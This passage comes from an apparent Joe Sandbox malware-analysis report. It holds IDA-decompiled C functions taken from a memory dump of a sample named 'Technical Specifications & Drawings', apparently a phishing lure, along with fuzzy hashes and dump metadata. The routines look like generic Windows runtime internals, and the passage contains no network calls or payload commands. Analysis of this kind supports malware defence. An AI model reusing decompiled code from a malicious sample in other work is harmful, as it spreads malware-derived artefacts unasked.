                                                  						continue;
                                                  					}
                                                  					goto L12;
                                                  				}
                                                  				E017C2280(0xd, 0x7aef1a0);
                                                  				_t41 =  *0x18960f8; // 0x0
                                                  				if(_t41 != 0) {
                                                  					 *0x18960f8 =  *_t41;
                                                  					 *0x18960fc =  *0x18960fc + 0xffff;
                                                  				}
                                                  				E017BFFB0(_t41, 0x800, 0x7aef1a0);
                                                  				if(_t41 != 0) {
                                                  					L6:
                                                  					asm("movsd");
                                                  					asm("movsd");
                                                  					asm("movsd");
                                                  					asm("movsd");
                                                  					 *((intOrPtr*)(_t41 + 0x1c)) = _v12;
                                                  					 *((intOrPtr*)(_t41 + 0x20)) = _a4;
                                                  					 *(_t41 + 0x36) =  *(_t41 + 0x36) & 0x00008000 | _a8 & 0x00003fff;
                                                  					do {
                                                  						asm("lock xadd [0x18960f0], ax");
                                                  						 *((short*)(_t41 + 0x34)) = 1;
                                                  					} while (1 == 0);
                                                  					goto L8;
                                                  				} else {
                                                  					_t41 = L017C4620(0x1896100,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0xd0);
                                                  					if(_t41 == 0) {
                                                  						L11:
                                                  						asm("lock dec dword [0x1896100]");
                                                  						L8:
                                                  						return _t41;
                                                  					}
                                                  					 *(_t41 + 0x24) =  *(_t41 + 0x24) & 0x00000000;
                                                  					 *(_t41 + 0x28) =  *(_t41 + 0x28) & 0x00000000;
                                                  					if(_t41 == 0) {
                                                  						goto L11;
                                                  					}
                                                  					goto L6;
                                                  				}
                                                  			}











                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5280389a89e479466ebc96fab8f8e654031c520da834a9fad98319e88f8bfe6b
                                                  • Instruction ID: fbb18adf3cfaae5a0cdcfab896728f45dc334aa0f3ae83ba73500e705db7c81b
                                                  • Opcode Fuzzy Hash: 5280389a89e479466ebc96fab8f8e654031c520da834a9fad98319e88f8bfe6b
                                                  • Instruction Fuzzy Hash: 4731F27660061A9FCB21DF58C4C07A6B7B4FF19310F1A0079ED49EB20AFB74DA498B90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 76%
                                                  			E017A9100(signed int __ebx, void* __ecx, void* __edi, signed int __esi, void* __eflags) {
                                                  				signed int _t53;
                                                  				signed int _t56;
                                                  				signed int* _t60;
                                                  				signed int _t63;
                                                  				signed int _t66;
                                                  				signed int _t69;
                                                  				void* _t70;
                                                  				intOrPtr* _t72;
                                                  				void* _t78;
                                                  				void* _t79;
                                                  				signed int _t80;
                                                  				intOrPtr _t82;
                                                  				void* _t85;
                                                  				void* _t88;
                                                  				void* _t89;
                                                  
                                                  				_t84 = __esi;
                                                  				_t70 = __ecx;
                                                  				_t68 = __ebx;
                                                  				_push(0x2c);
                                                  				_push(0x187f6e8);
                                                  				E017FD0E8(__ebx, __edi, __esi);
                                                  				 *((char*)(_t85 - 0x1d)) = 0;
                                                  				_t82 =  *((intOrPtr*)(_t85 + 8));
                                                  				if(_t82 == 0) {
                                                  					L4:
                                                  					if( *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) == 0) {
                                                  						E018788F5(_t68, _t70, _t78, _t82, _t84, __eflags);
                                                  					}
                                                  					L5:
                                                  					return E017FD130(_t68, _t82, _t84);
                                                  				}
                                                  				_t88 = _t82 -  *0x18986c0; // 0x12607b0
                                                  				if(_t88 == 0) {
                                                  					goto L4;
                                                  				}
                                                  				_t89 = _t82 -  *0x18986b8; // 0x0
                                                  				if(_t89 == 0 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
                                                  					goto L4;
                                                  				} else {
                                                  					E017C2280(_t82 + 0xe0, _t82 + 0xe0);
                                                  					 *(_t85 - 4) =  *(_t85 - 4) & 0x00000000;
                                                  					__eflags =  *((char*)(_t82 + 0xe5));
                                                  					if(__eflags != 0) {
                                                  						E018788F5(__ebx, _t70, _t78, _t82, __esi, __eflags);
                                                  						goto L12;
                                                  					} else {
                                                  						__eflags =  *((char*)(_t82 + 0xe4));
                                                  						if( *((char*)(_t82 + 0xe4)) == 0) {
                                                  							 *((char*)(_t82 + 0xe4)) = 1;
                                                  							_push(_t82);
                                                  							_push( *((intOrPtr*)(_t82 + 0x24)));
                                                  							E017EAFD0();
                                                  						}
                                                  						while(1) {
                                                  							_t60 = _t82 + 8;
                                                  							 *(_t85 - 0x2c) = _t60;
                                                  							_t68 =  *_t60;
                                                  							_t80 = _t60[1];
                                                  							 *(_t85 - 0x28) = _t68;
                                                  							 *(_t85 - 0x24) = _t80;
                                                  							while(1) {
                                                  								L10:
                                                  								__eflags = _t80;
                                                  								if(_t80 == 0) {
                                                  									break;
                                                  								}
                                                  								_t84 = _t68;
                                                  								 *(_t85 - 0x30) = _t80;
                                                  								 *(_t85 - 0x24) = _t80 - 1;
                                                  								asm("lock cmpxchg8b [edi]");
                                                  								_t68 = _t84;
                                                  								 *(_t85 - 0x28) = _t68;
                                                  								 *(_t85 - 0x24) = _t80;
                                                  								__eflags = _t68 - _t84;
                                                  								_t82 =  *((intOrPtr*)(_t85 + 8));
                                                  								if(_t68 != _t84) {
                                                  									continue;
                                                  								}
                                                  								__eflags = _t80 -  *(_t85 - 0x30);
                                                  								if(_t80 !=  *(_t85 - 0x30)) {
                                                  									continue;
                                                  								}
                                                  								__eflags = _t80;
                                                  								if(_t80 == 0) {
                                                  									break;
                                                  								}
                                                  								_t63 = 0;
                                                  								 *(_t85 - 0x34) = 0;
                                                  								_t84 = 0;
                                                  								__eflags = 0;
                                                  								while(1) {
                                                  									 *(_t85 - 0x3c) = _t84;
                                                  									__eflags = _t84 - 3;
                                                  									if(_t84 >= 3) {
                                                  										break;
                                                  									}
                                                  									__eflags = _t63;
                                                  									if(_t63 != 0) {
                                                  										L40:
                                                  										_t84 =  *_t63;
                                                  										__eflags = _t84;
                                                  										if(_t84 != 0) {
                                                  											_t84 =  *(_t84 + 4);
                                                  											__eflags = _t84;
                                                  											if(_t84 != 0) {
                                                  												 *0x189b1e0(_t63, _t82);
                                                  												 *_t84();
                                                  											}
                                                  										}
                                                  										do {
                                                  											_t60 = _t82 + 8;
                                                  											 *(_t85 - 0x2c) = _t60;
                                                  											_t68 =  *_t60;
                                                  											_t80 = _t60[1];
                                                  											 *(_t85 - 0x28) = _t68;
                                                  											 *(_t85 - 0x24) = _t80;
                                                  											goto L10;
                                                  										} while (_t63 == 0);
                                                  										goto L40;
                                                  									}
                                                  									_t69 = 0;
                                                  									__eflags = 0;
                                                  									while(1) {
                                                  										 *(_t85 - 0x38) = _t69;
                                                  										__eflags = _t69 -  *0x18984c0;
                                                  										if(_t69 >=  *0x18984c0) {
                                                  											break;
                                                  										}
                                                  										__eflags = _t63;
                                                  										if(_t63 != 0) {
                                                  											break;
                                                  										}
                                                  										_t66 = E01879063(_t69 * 0xc +  *((intOrPtr*)(_t82 + 0x10 + _t84 * 4)), _t80, _t82);
                                                  										__eflags = _t66;
                                                  										if(_t66 == 0) {
                                                  											_t63 = 0;
                                                  											__eflags = 0;
                                                  										} else {
                                                  											_t63 = _t66 + 0xfffffff4;
                                                  										}
                                                  										 *(_t85 - 0x34) = _t63;
                                                  										_t69 = _t69 + 1;
                                                  									}
                                                  									_t84 = _t84 + 1;
                                                  								}
                                                  								__eflags = _t63;
                                                  							}
                                                  							 *((intOrPtr*)(_t82 + 0xf4)) =  *((intOrPtr*)(_t85 + 4));
                                                  							 *((char*)(_t82 + 0xe5)) = 1;
                                                  							 *((char*)(_t85 - 0x1d)) = 1;
                                                  							L12:
                                                  							 *(_t85 - 4) = 0xfffffffe;
                                                  							E017A922A(_t82);
                                                  							_t53 = E017C7D50();
                                                  							__eflags = _t53;
                                                  							if(_t53 != 0) {
                                                  								_t56 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                  							} else {
                                                  								_t56 = 0x7ffe0386;
                                                  							}
                                                  							__eflags =  *_t56;
                                                  							if( *_t56 != 0) {
                                                  								_t56 = E01878B58(_t82);
                                                  							}
                                                  							__eflags =  *((char*)(_t85 - 0x1d));
                                                  							if( *((char*)(_t85 - 0x1d)) != 0) {
                                                  								__eflags = _t82 -  *0x18986c0; // 0x12607b0
                                                  								if(__eflags != 0) {
                                                  									__eflags = _t82 -  *0x18986b8; // 0x0
                                                  									if(__eflags == 0) {
                                                  										_t79 = 0x18986bc;
                                                  										_t72 = 0x18986b8;
                                                  										goto L18;
                                                  									}
                                                  									__eflags = _t56 | 0xffffffff;
                                                  									asm("lock xadd [edi], eax");
                                                  									if(__eflags == 0) {
                                                  										E017A9240(_t68, _t82, _t82, _t84, __eflags);
                                                  									}
                                                  								} else {
                                                  									_t79 = 0x18986c4;
                                                  									_t72 = 0x18986c0;
                                                  									L18:
                                                  									E017D9B82(_t68, _t72, _t79, _t82, _t84, __eflags);
                                                  								}
                                                  							}
                                                  							goto L5;
                                                  						}
                                                  					}
                                                  				}
                                                  			}



















                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1f60a3b796f7e2cce909de92ce75ae501c0b47312bc7f307d93a1bfde6f29fcc
                                                  • Instruction ID: 87cbb2b8c4f25bd9818f1ee93092cf287f542390e16208fc0d8d60b502cc51b1
                                                  • Opcode Fuzzy Hash: 1f60a3b796f7e2cce909de92ce75ae501c0b47312bc7f307d93a1bfde6f29fcc
                                                  • Instruction Fuzzy Hash: B331B571A05246DFDB26DB6CC48C7ADFBB1BBCA318F58825DC604A7241D334BA90CB51
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 60%
                                                  			E017D1DB5(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
                                                  				char _v8;
                                                  				intOrPtr _v12;
                                                  				intOrPtr _v16;
                                                  				intOrPtr* _v20;
                                                  				void* _t22;
                                                  				char _t23;
                                                  				void* _t36;
                                                  				intOrPtr _t42;
                                                  				intOrPtr _t43;
                                                  
                                                  				_v12 = __ecx;
                                                  				_t43 = 0;
                                                  				_v20 = __edx;
                                                  				_t42 =  *__edx;
                                                  				 *__edx = 0;
                                                  				_v16 = _t42;
                                                  				_push( &_v8);
                                                  				_push(0);
                                                  				_push(0);
                                                  				_push(6);
                                                  				_push(0);
                                                  				_push(__ecx);
                                                  				_t36 = ((0 | __ecx !=  *((intOrPtr*)( *[fs:0x30] + 8))) - 0x00000001 & 0xc0000000) + 0x40000002;
                                                  				_push(_t36);
                                                  				_t22 = E017CF460();
                                                  				if(_t22 < 0) {
                                                  					if(_t22 == 0xc0000023) {
                                                  						goto L1;
                                                  					}
                                                  					L3:
                                                  					return _t43;
                                                  				}
                                                  				L1:
                                                  				_t23 = _v8;
                                                  				if(_t23 != 0) {
                                                  					_t38 = _a4;
                                                  					if(_t23 >  *_a4) {
                                                  						_t42 = L017C4620(_t38,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t23);
                                                  						if(_t42 == 0) {
                                                  							goto L3;
                                                  						}
                                                  						_t23 = _v8;
                                                  					}
                                                  					_push( &_v8);
                                                  					_push(_t23);
                                                  					_push(_t42);
                                                  					_push(6);
                                                  					_push(_t43);
                                                  					_push(_v12);
                                                  					_push(_t36);
                                                  					if(E017CF460() < 0) {
                                                  						if(_t42 != 0 && _t42 != _v16) {
                                                  							L017C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t43, _t42);
                                                  						}
                                                  						goto L3;
                                                  					}
                                                  					 *_v20 = _t42;
                                                  					 *_a4 = _v8;
                                                  				}
                                                  				_t43 = 1;
                                                  				goto L3;
                                                  			}













                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                                                  • Instruction ID: a861442a0026a480b6e44c1f99379954da3750f681830addb15dca732fee030f
                                                  • Opcode Fuzzy Hash: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                                                  • Instruction Fuzzy Hash: 53218E72600119EFD721CF99CC84EABFBBDEF89751F514099EA05A7210D634AE01CBA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 77%
                                                  			E01826C0A(signed short* __ecx, signed char __edx, signed char _a4, signed char _a8) {
                                                  				signed short* _v8;
                                                  				signed char _v12;
                                                  				void* _t22;
                                                  				signed char* _t23;
                                                  				intOrPtr _t24;
                                                  				signed short* _t44;
                                                  				void* _t47;
                                                  				signed char* _t56;
                                                  				signed char* _t58;
                                                  
                                                  				_t48 = __ecx;
                                                  				_push(__ecx);
                                                  				_push(__ecx);
                                                  				_t44 = __ecx;
                                                  				_v12 = __edx;
                                                  				_v8 = __ecx;
                                                  				_t22 = E017C7D50();
                                                  				_t58 = 0x7ffe0384;
                                                  				if(_t22 == 0) {
                                                  					_t23 = 0x7ffe0384;
                                                  				} else {
                                                  					_t23 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                  				}
                                                  				if( *_t23 != 0) {
                                                  					_t24 =  *0x1897b9c; // 0x0
                                                  					_t47 = ( *_t44 & 0x0000ffff) + 0x30;
                                                  					_t23 = L017C4620(_t48,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t24 + 0x180000, _t47);
                                                  					_t56 = _t23;
                                                  					if(_t56 != 0) {
                                                  						_t56[0x24] = _a4;
                                                  						_t56[0x28] = _a8;
                                                  						_t56[6] = 0x1420;
                                                  						_t56[0x20] = _v12;
                                                  						_t14 =  &(_t56[0x2c]); // 0x2c
                                                  						E017EF3E0(_t14, _v8[2],  *_v8 & 0x0000ffff);
                                                  						_t56[0x2c + (( *_v8 & 0x0000ffff) >> 1) * 2] = 0;
                                                  						if(E017C7D50() != 0) {
                                                  							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                  						}
                                                  						_push(_t56);
                                                  						_push(_t47 - 0x20);
                                                  						_push(0x402);
                                                  						_push( *_t58 & 0x000000ff);
                                                  						E017E9AE0();
                                                  						_t23 = L017C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t56);
                                                  					}
                                                  				}
                                                  				return _t23;
                                                  			}













                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4fe7c92ce8640698f0ba0206238bc41fc8e15690983c44c0aa3c7ba77d7558f4
                                                  • Instruction ID: 37fc4a6222aba9aa2f372135c8c8a66568807ab61e88958e4ccaa87238c7f702
                                                  • Opcode Fuzzy Hash: 4fe7c92ce8640698f0ba0206238bc41fc8e15690983c44c0aa3c7ba77d7558f4
                                                  • Instruction Fuzzy Hash: 2321ADB1A00655AFD716DB68D844F2AB7B8FF48704F140069F905D7790E634EE50CBA4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 82%
                                                  			E017E90AF(intOrPtr __ecx, void* __edx, intOrPtr* _a4) {
                                                  				intOrPtr* _v0;
                                                  				void* _v8;
                                                  				signed int _v12;
                                                  				intOrPtr _v16;
                                                  				char _v36;
                                                  				void* _t38;
                                                  				intOrPtr _t41;
                                                  				void* _t44;
                                                  				signed int _t45;
                                                  				intOrPtr* _t49;
                                                  				signed int _t57;
                                                  				signed int _t58;
                                                  				intOrPtr* _t59;
                                                  				void* _t62;
                                                  				void* _t63;
                                                  				void* _t65;
                                                  				void* _t66;
                                                  				signed int _t69;
                                                  				intOrPtr* _t70;
                                                  				void* _t71;
                                                  				intOrPtr* _t72;
                                                  				intOrPtr* _t73;
                                                  				char _t74;
                                                  
                                                  				_t65 = __edx;
                                                  				_t57 = _a4;
                                                  				_t32 = __ecx;
                                                  				_v8 = __edx;
                                                  				_t3 = _t32 + 0x14c; // 0x14c
                                                  				_t70 = _t3;
                                                  				_v16 = __ecx;
                                                  				_t72 =  *_t70;
                                                  				while(_t72 != _t70) {
                                                  					if( *((intOrPtr*)(_t72 + 0xc)) != _t57) {
                                                  						L24:
                                                  						_t72 =  *_t72;
                                                  						continue;
                                                  					}
                                                  					_t30 = _t72 + 0x10; // 0x10
                                                  					if(E017FD4F0(_t30, _t65, _t57) == _t57) {
                                                  						return 0xb7;
                                                  					}
                                                  					_t65 = _v8;
                                                  					goto L24;
                                                  				}
                                                  				_t61 = _t57;
                                                  				_push( &_v12);
                                                  				_t66 = 0x10;
                                                  				if(E017DE5E0(_t57, _t66) < 0) {
                                                  					return 0x216;
                                                  				}
                                                  				_t73 = L017C4620(_t61,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v12);
                                                  				if(_t73 == 0) {
                                                  					_t38 = 0xe;
                                                  					return _t38;
                                                  				}
                                                  				_t9 = _t73 + 0x10; // 0x10
                                                  				 *((intOrPtr*)(_t73 + 0xc)) = _t57;
                                                  				E017EF3E0(_t9, _v8, _t57);
                                                  				_t41 =  *_t70;
                                                  				if( *((intOrPtr*)(_t41 + 4)) != _t70) {
                                                  					_t62 = 3;
                                                  					asm("int 0x29");
                                                  					_push(_t62);
                                                  					_push(_t57);
                                                  					_push(_t73);
                                                  					_push(_t70);
                                                  					_t71 = _t62;
                                                  					_t74 = 0;
                                                  					_v36 = 0;
                                                  					_t63 = E017DA2F0(_t62, _t71, 1, 6,  &_v36);
                                                  					if(_t63 == 0) {
                                                  						L20:
                                                  						_t44 = 0x57;
                                                  						return _t44;
                                                  					}
                                                  					_t45 = _v12;
                                                  					_t58 = 0x1c;
                                                  					if(_t45 < _t58) {
                                                  						goto L20;
                                                  					}
                                                  					_t69 = _t45 / _t58;
                                                  					if(_t69 == 0) {
                                                  						L19:
                                                  						return 0xe8;
                                                  					}
                                                  					_t59 = _v0;
                                                  					do {
                                                  						if( *((intOrPtr*)(_t63 + 0xc)) != 2) {
                                                  							goto L18;
                                                  						}
                                                  						_t49 =  *((intOrPtr*)(_t63 + 0x14)) + _t71;
                                                  						 *_t59 = _t49;
                                                  						if( *_t49 != 0x53445352) {
                                                  							goto L18;
                                                  						}
                                                  						 *_a4 =  *((intOrPtr*)(_t63 + 0x10));
                                                  						return 0;
                                                  						L18:
                                                  						_t63 = _t63 + 0x1c;
                                                  						_t74 = _t74 + 1;
                                                  					} while (_t74 < _t69);
                                                  					goto L19;
                                                  				}
                                                  				 *_t73 = _t41;
                                                  				 *((intOrPtr*)(_t73 + 4)) = _t70;
                                                  				 *((intOrPtr*)(_t41 + 4)) = _t73;
                                                  				 *_t70 = _t73;
                                                  				 *(_v16 + 0xdc) =  *(_v16 + 0xdc) | 0x00000010;
                                                  				return 0;
                                                  			}


                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                                                  • Instruction ID: 873fd6e6a55c0e5149bf919c9f2cc42fb2c7539b2da8b80724d48808ab3e4fac
                                                  • Opcode Fuzzy Hash: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                                                  • Instruction Fuzzy Hash: 4A215372A00315EFDB21DF59C848AAAFBF8EB58754F15846EEA49E7250D330ED40CB90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 59%
                                                  			E017D3B7A(void* __ecx) {
                                                  				signed int _v8;
                                                  				char _v12;
                                                  				intOrPtr _v20;
                                                  				intOrPtr _t17;
                                                  				intOrPtr _t26;
                                                  				void* _t35;
                                                  				void* _t38;
                                                  				void* _t41;
                                                  				intOrPtr _t44;
                                                  
                                                  				_t17 =  *0x18984c4; // 0x0
                                                  				_v12 = 1;
                                                  				_v8 =  *0x18984c0 * 0x4c;
                                                  				_t41 = __ecx;
                                                  				_t35 = L017C4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t17 + 0x000c0000 | 0x00000008,  *0x18984c0 * 0x4c);
                                                  				if(_t35 == 0) {
                                                  					_t44 = 0xc0000017;
                                                  				} else {
                                                  					_push( &_v8);
                                                  					_push(_v8);
                                                  					_push(_t35);
                                                  					_push(4);
                                                  					_push( &_v12);
                                                  					_push(0x6b);
                                                  					_t44 = E017EAA90();
                                                  					_v20 = _t44;
                                                  					if(_t44 >= 0) {
                                                  						E017EFA60( *((intOrPtr*)(_t41 + 0x20)), 0,  *0x18984c0 * 0xc);
                                                  						_t38 = _t35;
                                                  						if(_t35 < _v8 + _t35) {
                                                  							do {
                                                  								asm("movsd");
                                                  								asm("movsd");
                                                  								asm("movsd");
                                                  								_t38 = _t38 +  *((intOrPtr*)(_t38 + 4));
                                                  							} while (_t38 < _v8 + _t35);
                                                  							_t44 = _v20;
                                                  						}
                                                  					}
                                                  					_t26 =  *0x18984c4; // 0x0
                                                  					L017C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t26 + 0xc0000, _t35);
                                                  				}
                                                  				return _t44;
                                                  			}


                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d3253a8c0f7d9df46cdce69e67f9d6a7ea2e06e880f8e1920ba72b0f69815e83
                                                  • Instruction ID: 898a8a2ba56b854758ca1cacb20efcbe498874acdfc05f0203ae6300b7ea796c
                                                  • Opcode Fuzzy Hash: d3253a8c0f7d9df46cdce69e67f9d6a7ea2e06e880f8e1920ba72b0f69815e83
                                                  • Instruction Fuzzy Hash: 072180B2600109EFC714DF58CD85B9ABBBDFB45708F190068E509AB251D771EE018B90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 80%
                                                  			E01826CF0(void* __edx, intOrPtr _a4, short _a8) {
                                                  				char _v8;
                                                  				char _v12;
                                                  				char _v16;
                                                  				char _v20;
                                                  				char _v28;
                                                  				char _v36;
                                                  				char _v52;
                                                  				void* __ebx;
                                                  				void* __edi;
                                                  				void* __esi;
                                                  				void* __ebp;
                                                  				signed char* _t21;
                                                  				void* _t24;
                                                  				void* _t36;
                                                  				void* _t38;
                                                  				void* _t46;
                                                  
                                                  				_push(_t36);
                                                  				_t46 = __edx;
                                                  				_v12 = 0;
                                                  				_v8 = 0;
                                                  				_v20 = 0;
                                                  				_v16 = 0;
                                                  				if(E017C7D50() == 0) {
                                                  					_t21 = 0x7ffe0384;
                                                  				} else {
                                                  					_t21 = ( *[fs:0x30])[0x50] + 0x22a;
                                                  				}
                                                  				if( *_t21 != 0) {
                                                  					_t21 =  *[fs:0x30];
                                                  					if((_t21[0x240] & 0x00000004) != 0) {
                                                  						if(E017C7D50() == 0) {
                                                  							_t21 = 0x7ffe0385;
                                                  						} else {
                                                  							_t21 = ( *[fs:0x30])[0x50] + 0x22b;
                                                  						}
                                                  						if(( *_t21 & 0x00000020) != 0) {
                                                  							_t56 = _t46;
                                                  							if(_t46 == 0) {
                                                  								_t46 = 0x1785c80;
                                                  							}
                                                  							_push(_t46);
                                                  							_push( &_v12);
                                                  							_t24 = E017DF6E0(_t36, 0, _t46, _t56);
                                                  							_push(_a4);
                                                  							_t38 = _t24;
                                                  							_push( &_v28);
                                                  							_t21 = E017DF6E0(_t38, 0, _t46, _t56);
                                                  							if(_t38 != 0) {
                                                  								if(_t21 != 0) {
                                                  									E01827016(_a8, 0, 0, 0,  &_v36,  &_v28);
                                                  									L017C2400( &_v52);
                                                  								}
                                                  								_t21 = L017C2400( &_v28);
                                                  							}
                                                  						}
                                                  					}
                                                  				}
                                                  				return _t21;
                                                  			}


                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4703210886f501a5b124f310ebf1b6cb8fd07dbc1a0a9db55b21648f72520dc8
                                                  • Instruction ID: 5a15531773b91c4a3cefc70be28b7a8505d278e2df7a2759288f8e646f4504f5
                                                  • Opcode Fuzzy Hash: 4703210886f501a5b124f310ebf1b6cb8fd07dbc1a0a9db55b21648f72520dc8
                                                  • Instruction Fuzzy Hash: 712125724002899BD312DF28C948B67FBECEF91740F18045AFD40C7251EB35CA88C6A2
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 67%
                                                  			E0187070D(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
                                                  				char _v8;
                                                  				intOrPtr _v11;
                                                  				signed int _v12;
                                                  				intOrPtr _v15;
                                                  				signed int _v16;
                                                  				intOrPtr _v28;
                                                  				void* __ebx;
                                                  				char* _t32;
                                                  				signed int* _t38;
                                                  				signed int _t60;
                                                  
                                                  				_t38 = __ecx;
                                                  				_v16 = __edx;
                                                  				_t60 = E018707DF(__ecx, __edx,  &_a4,  &_a8, 2);
                                                  				if(_t60 != 0) {
                                                  					_t7 = _t38 + 0x38; // 0x29cd5903
                                                  					_push( *_t7);
                                                  					_t9 = _t38 + 0x34; // 0x6adeeb00
                                                  					_push( *_t9);
                                                  					_v12 = _a8 << 0xc;
                                                  					_t11 = _t38 + 4; // 0x5de58b5b
                                                  					_push(0x4000);
                                                  					_v8 = (_a4 << 0xc) + (_v16 - ( *__ecx & _v16) >> 4 <<  *_t11) + ( *__ecx & _v16);
                                                  					E0186AFDE( &_v8,  &_v12);
                                                  					E01871293(_t38, _v28, _t60);
                                                  					if(E017C7D50() == 0) {
                                                  						_t32 = 0x7ffe0380;
                                                  					} else {
                                                  						_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                  					}
                                                  					if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                                                  						_t21 = _t38 + 0x3c; // 0xc3595e5f
                                                  						E018614FB(_t38,  *_t21, _v11, _v15, 0xd);
                                                  					}
                                                  				}
                                                  				return  ~_t60;
                                                  			}














                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
